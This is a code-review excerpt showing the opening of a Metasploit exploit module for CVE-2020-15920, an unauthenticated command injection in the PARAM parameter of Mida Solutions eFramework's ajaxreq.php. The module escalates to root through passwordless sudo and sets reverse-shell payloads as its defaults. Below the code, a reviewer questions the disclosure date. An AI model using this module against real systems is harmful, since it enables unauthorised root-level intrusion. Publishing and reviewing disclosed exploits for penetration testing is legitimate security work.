modules/exploits/linux/http/mida_solutions_eframework_ajaxreq_rce.rb

```diff
@@ -0,0 +1,134 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Mida Solutions eFramework ajaxreq.php Command Injection',
+        'Description' => %q{
+          This module exploits a command injection vulnerability in Mida
+          Solutions eFramework version 2.9.0 and prior.
+
+          The `ajaxreq.php` file allows unauthenticated users to inject
+          arbitrary commands in the `PARAM` parameter to be executed as the
+          apache user. This user is permitted to execute any command as root
+          using sudo without providing a password, resulting in privileged
+          command execution as root.
+
+          This module has been successfully tested on Mida Solutions
+          eFramework-C7-2.9.0 virtual appliance.
+        },
+        'License' => MSF_LICENSE,
+        'Author' =>
+          [
+            'elbae', # discovery and exploit
+            'bcoles', # Metasploit
+          ],
+        'References' =>
+          [
+            ['CVE', '2020-15920'],
+            ['EDB', '48768'],
+            ['URL', 'https://elbae.github.io/jekyll/update/2020/07/14/vulns-01.html'],
+          ],
+        'Payload' => { 'BadChars' => "\x00" },
+        'Targets' =>
+          [
+            [
+              'Linux (x86)', {
+                'Arch' => ARCH_X86,
+                'Platform' => 'linux',
+                'DefaultOptions' => {
+                  'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp'
+                }
+              }
+            ],
+            [
+              'Linux (x64)', {
+                'Arch' => ARCH_X64,
+                'Platform' => 'linux',
+                'DefaultOptions' => {
+                  'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
+                }
+              }
+            ],
+            [
+              'UNIX (cmd)', {
+                'Arch' => ARCH_CMD,
+                'Platform' => 'unix',
+                'DefaultOptions' => {
+                  'PAYLOAD' => 'cmd/unix/reverse_bash'
+                }
+              }
+            ]
+          ],
+        'Privileged' => true,
+        'DisclosureDate' => '2020-08-27',
```

Comment:
Wasn't this technically released on July 14th, 2020 according to https://elbae.github.io/jekyll/update/2020/07/14/vulns-01.html ? The CVEs also appear to have been assigned around this date as well, so this seems like the more appropriate date to use.